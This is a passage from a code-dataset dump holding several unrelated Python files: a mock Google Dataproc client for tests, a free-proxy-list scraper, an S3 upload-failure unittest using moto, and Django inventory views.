to what was requested\n cluster = _dict_deep_update(cluster, body)\n\n # Create a local copy of advances states\n cluster['_get_advances_states'] = copy.copy(\n self._client.cluster_get_advances_states)\n\n _set_deep(self._clusters, [projectId, cluster_name], cluster)\n\n return cluster\n\n @mock_api\n def get(self, projectId=None, region=None, clusterName=None):\n assert projectId is not None\n assert region == _DATAPROC_API_REGION\n\n cluster = _get_deep(self._clusters, [projectId, clusterName])\n if not cluster:\n raise mock_google_error(404)\n\n # NOTE - TESTING ONLY - Side effect is to advance the state\n advances_states = cluster['_get_advances_states']\n if advances_states:\n next_state = advances_states.popleft()\n self._client.update_state(cluster, state=next_state)\n\n return cluster\n\n @mock_api\n def delete(self, projectId=None, region=None, clusterName=None):\n cluster = self.get(\n projectId=projectId,\n region=region,\n clusterName=clusterName,\n ).execute()\n\n return self._client.update_state(cluster, state='DELETING')\n\n############################# END END END ###############################\n######################### Dataproc Client - Clusters ##########################\n############################# END END END ###############################\n\n\n############################# BEGIN BEGIN BEGIN ###############################\n########################### Dataproc Client - Jobs ############################\n############################# BEGIN BEGIN BEGIN ###############################\n\n_JOB_STATE_MATCHER_ACTIVE = frozenset(['PENDING', 'RUNNING', 'CANCEL_PENDING'])\n_JOB_STATE_MATCHER_NON_ACTIVE = frozenset(['CANCELLED', 'DONE', 'ERROR'])\n_JOB_STATE_MATCHERS = {\n 'ALL': _JOB_STATE_MATCHER_ACTIVE | _JOB_STATE_MATCHER_NON_ACTIVE,\n 'ACTIVE': _JOB_STATE_MATCHER_ACTIVE,\n 'NON_ACTIVE': _JOB_STATE_MATCHER_NON_ACTIVE\n}\n\n_SCRIPT_NAME = 'mr_test_mockgoogleapiclient'\n_USER_NAME = 'testuser'\n_INPUT_DIR = ''\n_OUTPUT_DIR = ''\n\n\ndef _submit_hadoop_job_resp(\n project=None, cluster=None, script_name=None, now=None):\n \"\"\"Fake Dataproc Job metadata\"\"\"\n project = project or _TEST_PROJECT\n cluster = cluster or _DATAPROC_CLUSTER\n script_name = script_name or _SCRIPT_NAME\n now = now or datetime.utcnow()\n\n job_elements = [\n script_name, _USER_NAME, now.strftime('%Y%m%d'),\n now.strftime('%H%M%S'), now.strftime('%f')]\n\n job_id = '-'.join(job_elements + ['-', 'Step', '1', 'of', '1'])\n dir_name = '.'.join(job_elements)\n\n mock_response = {\n \"reference\": {\n \"projectId\": project,\n \"jobId\": job_id\n },\n \"placement\": {\n \"clusterName\": cluster,\n \"clusterUuid\": \"8b76d95e-ebdc-4b81-896d-b2c5009b3560\"\n },\n \"hadoopJob\": {\n \"mainJarFileUri\": (\n \"file:///usr/lib/hadoop-mapreduce/hadoop-streaming.jar\"),\n \"args\": [],\n \"loggingConfig\": {}\n },\n \"status\": {\n \"state\": \"PENDING\",\n \"stateStartTime\": _datetime_to_gcptime(now)\n },\n \"driverControlFilesUri\": (\n \"gs://dataproc-801485be-0997-40e7-84a7-00926031747c-us/\"\n \"google-cloud-dataproc-metainfo/\"\n \"8b76d95e-ebdc-4b81-896d-b2c5009b3560/jobs/%(job_id)s/\" % locals()\n ),\n \"driverOutputResourceUri\": (\n \"gs://dataproc-801485be-0997-40e7-84a7-00926031747c-us/\"\n \"google-cloud-dataproc-metainfo/\"\n \"8b76d95e-ebdc-4b81-896d-b2c5009b3560/jobs/%(job_id)s/\"\n \"driveroutput\" % locals()\n ),\n }\n return mock_response\n\n\nclass MockDataprocClientJobs(object):\n def __init__(self, client):\n assert isinstance(client, MockDataprocClient)\n self._client = client\n self._jobs = self._client._cache_jobs\n\n @mock_api\n def list(self, **kwargs):\n \"\"\"Emulate jobs().list -\n fields supported - projectId, region, clusterName, jobStateMatcher\n \"\"\"\n project_id = kwargs['projectId']\n region = kwargs['region']\n cluster_name = kwargs.get('clusterName')\n job_state_matcher = kwargs.get('jobStateMatcher') or 'ALL'\n\n assert project_id is not None\n assert region == _DATAPROC_API_REGION\n\n valid_job_states = _JOB_STATE_MATCHERS[job_state_matcher]\n\n item_list = []\n\n job_map = _get_deep(self._jobs, [project_id], dict())\n\n # Sort all jobs by latest status update time\n jobs_sorted_by_time = sorted(\n job_map.values(), key=lambda j: j['status']['stateStartTime'])\n for current_job in jobs_sorted_by_time:\n job_cluster = current_job['placement']['clusterName']\n job_state = current_job['status']['state']\n\n # Filter out non-matching clusters and job-states\n if cluster_name and job_cluster != cluster_name:\n continue\n elif job_state not in valid_job_states:\n continue\n\n item_list.append(current_job)\n\n return dict(items=item_list, kwargs=kwargs)\n\n def list_next(self, list_request, resp):\n return None\n\n @mock_api\n def get(self, projectId=None, region=None, jobId=None):\n assert projectId is not None\n assert region == _DATAPROC_API_REGION\n\n current_job = _get_deep(self._jobs, [projectId, jobId])\n if not current_job:\n raise mock_google_error(404)\n\n # NOTE - TESTING ONLY - Side effect is to advance the state\n advances_states = current_job['_get_advances_states']\n if advances_states:\n next_state = advances_states.popleft()\n self._client.update_state(current_job, state=next_state)\n\n return current_job\n\n @mock_api\n def cancel(self, projectId=None, region=None, jobId=None):\n assert projectId is not None\n assert region == _DATAPROC_API_REGION\n\n job = self.get(\n projectId=projectId, region=_DATAPROC_API_REGION, jobId=jobId)\n return self._client.update_state(job, state='CANCEL_PENDING')\n\n @mock_api\n def delete(self, projectId=None, region=None, jobId=None):\n assert projectId is not None\n assert region == _DATAPROC_API_REGION\n\n job = self.get(\n projectId=projectId, region=_DATAPROC_API_REGION, jobId=jobId)\n return self._client.update_state(job, state='DELETING')\n\n @mock_api\n def submit(self, projectId=None, region=None, body=None):\n assert projectId is not None\n assert region == _DATAPROC_API_REGION\n\n body = body or dict()\n\n # Create an empty job\n job = _submit_hadoop_job_resp()\n\n body_job = body.get('job') or dict()\n\n # Then do a deep-update as to what was requested\n _dict_deep_update(job, body_job)\n\n # Create a local copy of advances states\n job['_get_advances_states'] = copy.copy(\n self._client.job_get_advances_states)\n\n _set_deep(self._jobs, [projectId, job['reference']['jobId']], job)\n\n return job\n\n############################# END END END ###############################\n########################### Dataproc Client - Jobs ############################\n############################# END END END ###############################\n", "sub_path": "tests/mockgoogleapiclient.py", "file_name": "mockgoogleapiclient.py", "file_ext": "py", "file_size_in_byte": 30120, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "oauth2client.client.GoogleCredentials", "line_number": 34, "usage_type": "name"}, {"api_name": "googleapiclient.discovery", "line_number": 35, "usage_type": "name"}, {"api_name": "googleapiclient.errors", "line_number": 36, "usage_type": "name"}, {"api_name": "googleapiclient.http", "line_number": 37, "usage_type": "name"}, {"api_name": "tests.py2.mock.MagicMock", "line_number": 68, "usage_type": "call"}, {"api_name": "tests.py2.mock", "line_number": 68, "usage_type": "name"}, {"api_name": "googleapiclient.http.HttpRequest", "line_number": 68, "usage_type": "attribute"}, {"api_name": "googleapiclient.http", "line_number": 68, "usage_type": "name"}, {"api_name": "tests.py2.mock.Mock", "line_number": 77, "usage_type": "call"}, {"api_name": "tests.py2.mock", "line_number": 77, "usage_type": "name"}, {"api_name": "httplib2.Response", "line_number": 77, "usage_type": "name"}, {"api_name": "googleapiclient.errors.HttpError", "line_number": 79, "usage_type": "call"}, {"api_name": "googleapiclient.errors", "line_number": 79, "usage_type": "name"}, {"api_name": "collections.Mapping", "line_number": 146, "usage_type": "attribute"}, {"api_name": "tests.sandbox.SandboxedTestCase", "line_number": 162, "usage_type": "name"}, {"api_name": "tests.py2.patch.object", "line_number": 169, "usage_type": "call"}, {"api_name": "mrjob.dataproc.DataprocJobRunner", "line_number": 170, "usage_type": "argument"}, {"api_name": "tests.py2.patch", "line_number": 169, "usage_type": "name"}, {"api_name": "tests.py2.patch.object", "line_number": 172, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs.GCSFilesystem", "line_number": 173, "usage_type": "argument"}, {"api_name": "tests.py2.patch", "line_number": 172, "usage_type": "name"}, {"api_name": "tests.py2.patch.object", "line_number": 174, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs.GCSFilesystem", "line_number": 175, "usage_type": "argument"}, {"api_name": "tests.py2.patch", "line_number": 174, "usage_type": "name"}, {"api_name": "tests.py2.patch.object", "line_number": 176, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs.GCSFilesystem", "line_number": 177, "usage_type": "argument"}, {"api_name": "tests.py2.patch", "line_number": 176, "usage_type": "name"}, {"api_name": "tests.py2.patch", "line_number": 182, "usage_type": "call"}, {"api_name": "tests.py2.patch.object", "line_number": 197, "usage_type": "call"}, {"api_name": "mrjob.dataproc.DataprocJobRunner", "line_number": 198, "usage_type": "argument"}, {"api_name": "tests.py2.patch", "line_number": 197, "usage_type": "name"}, {"api_name": "tests.py2.patch.object", "line_number": 201, "usage_type": "call"}, {"api_name": "tests.py2.patch", "line_number": 201, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 210, "usage_type": "call"}, {"api_name": "tests.mr_two_step_job.MRTwoStepJob", "line_number": 211, "usage_type": "call"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 234, "usage_type": "name"}, {"api_name": "unittest.skipIf", "line_number": 159, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 160, "usage_type": "attribute"}, {"api_name": "mrjob.fs.gcs.GCSFilesystem", "line_number": 256, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs.parse_gcs_uri", "line_number": 272, "usage_type": "call"}, {"api_name": "googleapiclient.errors.HttpError", "line_number": 276, "usage_type": "attribute"}, {"api_name": "googleapiclient.errors", "line_number": 276, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 279, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs.parse_gcs_uri", "line_number": 291, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs.parse_gcs_uri", "line_number": 306, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs._LS_FIELDS_TO_RETURN", "line_number": 336, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 340, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 436, "usage_type": "call"}, {"api_name": "mrjob.fs.gcs._hex_to_base64", "line_number": 443, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 496, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 497, "usage_type": "call"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 510, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 547, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 556, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 556, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 679, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 695, "usage_type": "call"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 705, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 758, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 758, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 818, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 849, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 866, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 869, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 875, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 878, "usage_type": "name"}, {"api_name": "mrjob.dataproc._DATAPROC_API_REGION", "line_number": 884, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 897, "usage_type": "call"}]} +{"seq_id": "583695165", "text": "from bs4 import BeautifulSoup\nimport requests\nimport re\n\nheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0','Connection': 'close'}\nWEB= {\n 1:'http://www.89ip.cn/index_1.html',\n 2:'https://free-proxy-list.net',\n 3:'https://api.proxyscrape.com/?request=share&proxytype=http&timeout=10000&country=all&ssl=all&anonymity=all',\n }\nv = [2,3] #国外网站\n\n# 请自行更换为自己SSR的端口,然后注释掉None\nPROXIES = {'http':'127.0.0.1:1080',\n 'https':'127.0.0.1:1080'}\nPROXIES = None\n\ndef color(sign,args=''):\n colors = {'[-]':'\\033[36m','[+]':'\\033[32m','[!]':'\\033[33m','[x]':'\\033[31m'}\n if sign in colors:\n return colors[sign]+sign+args+'\\033[0m'\n else: return sign+args\n\ndef get_connect(url,proxies,r=''):\n n = 0\n while True:\n try:\n res = requests.get(url,headers=headers,proxies=proxies,timeout=5)\n return res.text\n except:\n if r: \n n +=1\n print('\\r'+color('[!]',str(n)+' Try reconnect WEB %s '%r),end='')\n if n == 3:\n print('\\r'+color('[x]',' reconnect faild WEB %s '%r),end='')\n break\n else : continue\n return ''\n \n\n\ndef get_ips(rule,url) ->list:\n if rule == 1:\n return r1(rule,url)\n elif rule ==2:\n return r2(rule,url)\n elif rule ==3:\n return r3(rule,url)\n\ndef msg(r):\n print('\\r'+color('[-]','Try connect url %s '%str(r)),end='')\n \n\n\ndef r1(rule,url):\n msg(rule)\n ip = []\n for i in range(1,12):\n url = 'http://www.89ip.cn/index_'+str(i)+'.html'\n html = get_connect(url,PROXIES,rule)\n if html:\n msg(str(rule)+'.'+str(i))\n soup = BeautifulSoup(html,'lxml')\n tr = soup.find(class_='layui-table').find_all('tr')\n for item in tr[1:]:\n ip.append(item.find_all('td')[0].string.strip()+':'+item.find_all('td')[1].string.strip())\n l = len(ip)\n if l :\n print(' total= %s'%l)\n return ip\n return ''\n\ndef r2(rule,url):\n msg(rule)\n html = get_connect(url,PROXIES,rule)\n if html:\n msg(rule)\n soup = BeautifulSoup(html,'lxml')\n tr = soup.find(id='list').find('tbody').find_all('tr')\n ip = []\n for item in tr:\n ip.append(item.find_all('td')[0].string+':'+item.find_all('td')[1].string)\n print(' total= %s'%len(ip))\n return ip\n return ''\n\ndef r3(rule,url):\n msg(rule)\n html = get_connect(url,PROXIES,rule)\n if html:\n msg(rule)\n page = re.search(r'(?<=paste :).*(?=\\')',html).group()\n url = 'https://textitor.com/paste/'+page+'/plain'\n html = get_connect(url,PROXIES,2)\n html = html.split('\\r\\n')\n print(' total=%s'%len(html))\n return html[:-1]\n return ''\n\n", "sub_path": "proxies/rules.py", "file_name": "rules.py", "file_ext": "py", "file_size_in_byte": 2933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 28, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 63, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 78, "usage_type": "call"}, {"api_name": "re.search", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "444148434", "text": "import os\nimport pathlib\nimport shutil\nfrom unittest import TestCase\nimport tempfile\nimport boto3\nfrom moto import mock_s3\n\nfrom backend.corpora.lambdas.upload_failures.upload import delete_many_from_s3\n\ns3 = boto3.client(\"s3\")\n\n\nclass TestUploadFailureHandling(TestCase):\n def setUp(self) -> None:\n self.tmp_dir = tempfile.mkdtemp()\n self.h5ad_filename = pathlib.Path(self.tmp_dir, \"test.h5ad\")\n self.seurat_filename = pathlib.Path(self.tmp_dir, \"test.rds\")\n self.loom_filename = pathlib.Path(self.tmp_dir, \"test.loom\")\n self.cxg_filename = pathlib.Path(self.tmp_dir, \"test.cxg\")\n\n self.h5ad_filename.touch()\n self.cxg_filename.touch()\n self.seurat_filename.touch()\n self.loom_filename.touch()\n\n self.mock = mock_s3()\n self.mock.start()\n self.uuid = \"88aba04c-2d7e-4f76-8b67-071825e8bf46\"\n self.bucket_name = \"some_Bucket\"\n os.environ[\"ARTIFACT_BUCKET\"] = self.bucket_name\n cxg_file = f\"{self.uuid}/remixed.cxg\"\n h5ad_file = f\"{self.uuid}/remixed.h5ad\"\n rds_file = f\"{self.uuid}/remixed.rds\"\n loom_file = f\"{self.uuid}/remixed.loom\"\n s3.create_bucket(Bucket=self.bucket_name)\n\n s3.put_object(Bucket=self.bucket_name, Key=cxg_file, Body=\"words\")\n s3.put_object(Bucket=self.bucket_name, Key=h5ad_file, Body=\"words\")\n s3.put_object(Bucket=self.bucket_name, Key=rds_file, Body=\"words\")\n s3.put_object(Bucket=self.bucket_name, Key=loom_file, Body=\"words\")\n\n resp = s3.list_objects_v2(Bucket=self.bucket_name, Prefix=self.uuid)\n assert len(resp[\"Contents\"]) == 4\n assert resp[\"Contents\"][0][\"Key\"].split(\"/\")[0] == self.uuid\n\n def tearDown(self) -> None:\n self.mock.stop()\n shutil.rmtree(self.tmp_dir)\n\n def test_delete_from_s3_deletes_all_files(self):\n resp = s3.list_objects_v2(Bucket=self.bucket_name, Prefix=self.uuid)\n self.assertGreater(len(resp[\"Contents\"]), 0)\n delete_many_from_s3(self.bucket_name, self.uuid)\n\n resp = s3.list_objects_v2(Bucket=self.bucket_name, Prefix=self.uuid)\n self.assertNotIn(\"Contents\", resp)\n\n def test_delete_from_s3_handles_no_files(self):\n # delete files\n delete_many_from_s3(self.bucket_name, self.uuid)\n resp = s3.list_objects_v2(Bucket=self.bucket_name, Prefix=self.uuid)\n\n self.assertNotIn(\"Contents\", resp)\n # this should not raise any errors\n delete_many_from_s3(self.bucket_name, self.uuid)\n", "sub_path": "tests/unit/backend/corpora/lambdas/upload_failure/test_upload_failure.py", "file_name": "test_upload_failure.py", "file_ext": "py", "file_size_in_byte": 2515, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "boto3.client", "line_number": 11, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 14, "usage_type": "name"}, {"api_name": "tempfile.mkdtemp", "line_number": 16, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 18, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 19, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 20, "usage_type": "call"}, {"api_name": "moto.mock_s3", "line_number": 27, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 31, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 49, "usage_type": "call"}, {"api_name": "backend.corpora.lambdas.upload_failures.upload.delete_many_from_s3", "line_number": 54, "usage_type": "call"}, {"api_name": "backend.corpora.lambdas.upload_failures.upload.delete_many_from_s3", "line_number": 61, "usage_type": "call"}, {"api_name": "backend.corpora.lambdas.upload_failures.upload.delete_many_from_s3", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "205154739", "text": "import ast\nimport simplejson\nfrom django.views.generic.base import View\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\nfrom inventory.models import Item, InventoryItem, OpeningStock\nfrom sales.models import SalesItem\nfrom purchase.models import PurchaseItem\n\nclass AddItem(View):\n\n def get(self, request, *args, **kwargs):\n\n return render(request, 'inventory/add_item.html', {})\n\n def post(self, request, *args, **kwargs):\n\n if request.is_ajax():\n status = 200\n ctx_item = []\n item_details = ast.literal_eval(request.POST['item_details'])\n try:\n item = Item.objects.get(code=item_details['code'])\n res = {\n 'result': 'error',\n 'message': 'Item with this code is already exists',\n }\n except Exception as ex:\n item, created = Item.objects.get_or_create(code=item_details['code'], name=item_details['name'])\n ctx_item.append({\n 'id': item.id,\n 'name': item.name,\n 'code': item.code,\n 'current_stock': 0,\n })\n res = {\n 'result': 'ok',\n 'item': ctx_item,\n }\n response = simplejson.dumps(res)\n return HttpResponse(response, status=status, mimetype='application/json')\nclass DeleteItem(View):\n def get(self,request,*args,**kwargs):\n item_id = kwargs['item_id']\n item = Item.objects.get(id=item_id)\n sales = SalesItem.objects.filter(item=item)\n purchases = PurchaseItem.objects.filter(item=item)\n if purchases.count() == 0 and sales.count() == 0:\n item.delete()\n else:\n items = Item.objects.all()\n return render(request, 'inventory/items.html', {'items': items, 'message': 'Not able to delete this item'})\n return HttpResponseRedirect(reverse('items'))\n\nclass EditItem(View):\n\n def get(self, request, *args, **kwargs):\n status = 200\n item = Item.objects.get(id=kwargs['item_id'])\n ctx_item = []\n if request.is_ajax():\n ctx_item.append({\n 'name': item.name,\n 'code': item.code,\n 'id': item.id,\n })\n res = {\n 'result': 'ok',\n 'item': ctx_item,\n }\n response = simplejson.dumps(res)\n return HttpResponse(response, status=status, mimetype='application/json')\n return render(request, 'inventory/edit_item.html', {'item_id': item.id})\n\n def post(self, request, *args, **kwargs):\n status = 200\n item = Item.objects.get(id=kwargs['item_id'])\n item_details = ast.literal_eval(request.POST['item'])\n item.name = item_details['name']\n item.save()\n res = {\n 'result': 'ok',\n }\n response = simplejson.dumps(res)\n return HttpResponse(response, status=status, mimetype='application/json')\n\n\nclass ItemList(View):\n\n def get(self, request, *args, **kwargs):\n inventory_items = []\n status = 200\n items = Item.objects.all().order_by('name')\n current_stock = 0\n unit_price = 0\n if request.is_ajax():\n try:\n item_code = request.GET.get('item_code', '')\n item_name = request.GET.get('item_name', '')\n items = []\n if item_code:\n items = Item.objects.filter(code__istartswith=item_code)\n elif item_name:\n items = Item.objects.filter(name__istartswith=item_name)\n \n for item in items:\n try:\n inventory = InventoryItem.objects.get(item=item)\n except:\n inventory = None\n inventory_items.append({\n 'id': item.id,\n 'name': item.name,\n 'code': item.code,\n 'current_stock': inventory.quantity if inventory else 0 ,\n 'unit_price': inventory.unit_price if inventory else 0, \n 'selling_price': inventory.selling_price if inventory else 0, \n })\n except Exception as ex:\n response = simplejson.dumps({'result': 'error', 'error': str(ex)})\n return HttpResponse(response, status = status_code, mimetype = 'application/json')\n res = {\n 'result': 'ok',\n 'inventory_items': inventory_items,\n }\n response = simplejson.dumps(res)\n return HttpResponse(response, status=status, mimetype='application/json')\n \n return render(request, 'inventory/items.html', {'items': items})\n\nclass AddOpeningStock(View):\n def get(self, request, *args, **kwargs):\n return render(request, 'inventory/add_opening_stock.html', {})\n\n def post(self, request, *args, **kwargs):\n if request.is_ajax():\n status = 200\n ctx_item = []\n opening_stock_details = ast.literal_eval(request.POST['opening_stock_details'])\n item = Item.objects.get(code=opening_stock_details['item_code'])\n inventory_item, created = InventoryItem.objects.get_or_create(item=item)\n opening_stock,opening_stock_created = OpeningStock.objects.get_or_create(item=inventory_item)\n if opening_stock_created:\n opening_stock.quantity = opening_stock_details['quantity']\n else:\n opening_stock.quantity = opening_stock.quantity + int(opening_stock_details['quantity'])\n opening_stock.item = inventory_item\n opening_stock.unit_price = opening_stock_details['unit_price']\n opening_stock.selling_price = opening_stock_details['selling_price']\n opening_stock.save()\n if created:\n inventory_item.quantity = int(opening_stock_details['quantity'])\n else:\n inventory_item.quantity = inventory_item.quantity + int(opening_stock_details['quantity'])\n inventory_item.unit_price = opening_stock_details['unit_price']\n inventory_item.selling_price = opening_stock_details['selling_price']\n inventory_item.save()\n res = {\n 'result': 'ok',\n }\n response = simplejson.dumps(res)\n return HttpResponse(response, status=status, mimetype='application/json')\n\nclass OpeningStocklist(View):\n def get(self, request, *args, **kwargs):\n opening_stocks = OpeningStock.objects.all()\n return render(request, 'inventory/opening_stock.html', {'opening_stocks': opening_stocks})\n\nclass StockView(View):\n\n def get(self, request, *args, **kwargs):\n stock_items = InventoryItem.objects.all()\n return render(request, 'inventory/stock.html', {\n 'stock_items': stock_items\n })\n \n ", "sub_path": "basic_inventory/inventory/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7207, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "django.views.generic.base.View", "line_number": 12, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 23, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects.get", "line_number": 25, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 25, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.get_or_create", "line_number": 31, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 31, "usage_type": "name"}, {"api_name": "simplejson.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 43, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 44, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.get", "line_number": 47, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 47, "usage_type": "name"}, {"api_name": "sales.models", "line_number": 48, "usage_type": "name"}, {"api_name": "sales.models.SalesItem.objects.filter", "line_number": 48, "usage_type": "call"}, {"api_name": "sales.models.SalesItem.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "sales.models.SalesItem", "line_number": 48, "usage_type": "name"}, {"api_name": "purchase.models.PurchaseItem.objects.filter", "line_number": 49, "usage_type": "call"}, {"api_name": "purchase.models.PurchaseItem.objects", "line_number": 49, "usage_type": "attribute"}, {"api_name": "purchase.models.PurchaseItem", "line_number": 49, "usage_type": "name"}, {"api_name": "sales.models.count", "line_number": 50, "usage_type": "call"}, {"api_name": "sales.models", "line_number": 50, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.all", "line_number": 53, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 53, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 54, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 55, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 55, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 57, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.get", "line_number": 61, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 61, "usage_type": "name"}, {"api_name": "simplejson.dumps", "line_number": 73, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 74, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 75, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects.get", "line_number": 79, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 79, "usage_type": "name"}, {"api_name": "ast.literal_eval", "line_number": 80, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 86, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 87, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 90, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.all", "line_number": 95, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 95, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.filter", "line_number": 104, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 104, "usage_type": "name"}, {"api_name": "inventory.models.Item.objects.filter", "line_number": 106, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 106, "usage_type": "name"}, {"api_name": "inventory.models", "line_number": 110, "usage_type": "name"}, {"api_name": "inventory.models.InventoryItem.objects.get", "line_number": 110, "usage_type": "call"}, {"api_name": "inventory.models.InventoryItem.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "inventory.models.InventoryItem", "line_number": 110, "usage_type": "name"}, {"api_name": "inventory.models", "line_number": 112, "usage_type": "name"}, {"api_name": "inventory.models", "line_number": 117, "usage_type": "name"}, {"api_name": "inventory.models.quantity", "line_number": 117, "usage_type": "attribute"}, {"api_name": "inventory.models", "line_number": 118, "usage_type": "name"}, {"api_name": "inventory.models.unit_price", "line_number": 118, "usage_type": "attribute"}, {"api_name": "inventory.models", "line_number": 119, "usage_type": "name"}, {"api_name": "inventory.models.selling_price", "line_number": 119, "usage_type": "attribute"}, {"api_name": "simplejson.dumps", "line_number": 122, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 123, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 128, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 129, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 131, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 133, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 135, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 141, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects.get", "line_number": 142, "usage_type": "call"}, {"api_name": "inventory.models.Item.objects", "line_number": 142, "usage_type": "attribute"}, {"api_name": "inventory.models.Item", "line_number": 142, "usage_type": "name"}, {"api_name": "inventory.models.InventoryItem.objects.get_or_create", "line_number": 143, "usage_type": "call"}, {"api_name": "inventory.models.InventoryItem.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "inventory.models.InventoryItem", "line_number": 143, "usage_type": "name"}, {"api_name": "inventory.models.OpeningStock.objects.get_or_create", "line_number": 144, "usage_type": "call"}, {"api_name": 